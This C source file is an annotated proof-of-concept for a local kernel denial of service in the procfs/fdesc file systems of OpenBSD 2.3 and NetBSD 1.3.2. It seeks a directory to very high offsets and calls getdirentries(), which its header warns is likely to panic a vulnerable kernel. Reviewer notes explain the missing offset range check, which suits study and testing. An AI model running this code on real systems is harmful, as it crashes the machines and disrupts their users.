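/*
 * procfs/fdesc
 * OpenBSD 2.3 and NetBSD 1.3.2.
 *
 * Example code that issues getdirentries() calls on a directory after
 * lseek()ing to high offsets.
 * (warning: if your system is vulnerable this is very likely to cause a
 * kernel panic)
 *
 * Reviewer notes:
 *  - The only operations performed are open(O_RDONLY), lseek() and
 *    getdirentries(), so the code path is reachable by any local user who
 *    can open the directory. That makes this a local denial-of-service
 *    test case.
 *  - The property under test is whether the file system's directory-read
 *    routine range-checks a caller-supplied file offset before deriving
 *    an entry index from it. A correct implementation treats an offset
 *    past the last entry as end-of-directory (or an error).
 *    NOTE(review): the kernel-side details are inferred from the author's
 *    inline comment below, not from kernel source shown here.
 *  - The header names after each #include were lost when this listing was
 *    extracted; the ones below are the standard headers that declare the
 *    calls used.
 */
#include <sys/types.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Size of the buffer handed to getdirentries(). */
enum { DIRBUF_SIZE = 2048 };

/* Inclusive range of file offsets tried, as in the original listing. */
#define OFFSET_FIRST 0xf0000000UL
#define OFFSET_LAST  0xffffffffUL

/*
 * Open the directory named by argv[1] and, for every offset in
 * [OFFSET_FIRST, OFFSET_LAST], seek to that offset and request directory
 * entries.
 *
 * Exits with status 1 on a usage error or on the first failing
 * open()/lseek()/getdirentries(), and with status 0 once the whole range
 * has been walked without an error return.
 */
int
main(int argc, char *argv[])
{
	int dirfd;
	/*
	 * The original declared this as unsigned long; long matches the
	 * `long *basep` parameter of the BSD getdirentries() of that era.
	 * NOTE(review): newer systems declare the parameter as off_t *.
	 */
	long basep;
	unsigned long offset;
	char buf[DIRBUF_SIZE];

	if (argc < 2) {
		fprintf(stderr, "usage: %s directory\n", argv[0]);
		exit(1);
	}

	dirfd = open(argv[1], O_RDONLY);
	if (dirfd == -1) {
		perror("open");
		exit(1);
	}

	/*
	 * The original loop condition was `hmm <= 0xffffffff`. Where
	 * unsigned long is 32 bits wide that is always true, so the counter
	 * wrapped to 0 and the loop never ended. Testing for the last
	 * offset at the bottom of the body terminates on any width.
	 */
	for (offset = OFFSET_FIRST; ; offset++) {
		if (lseek(dirfd, (off_t)offset, SEEK_SET) == -1) {
			perror("lseek");
			exit(1);
		}

		/*
		 * Author's note: the address won't effectively change, but
		 * the index variable used as a test will be very large, so
		 * the kernel's loop should continue and break something.
		 */
		if (getdirentries(dirfd, buf, sizeof buf, &basep) == -1) {
			perror("getdirentries");
			exit(1);
		}

		if (offset == OFFSET_LAST)
			break;
	}

	close(dirfd);
	return 0;
}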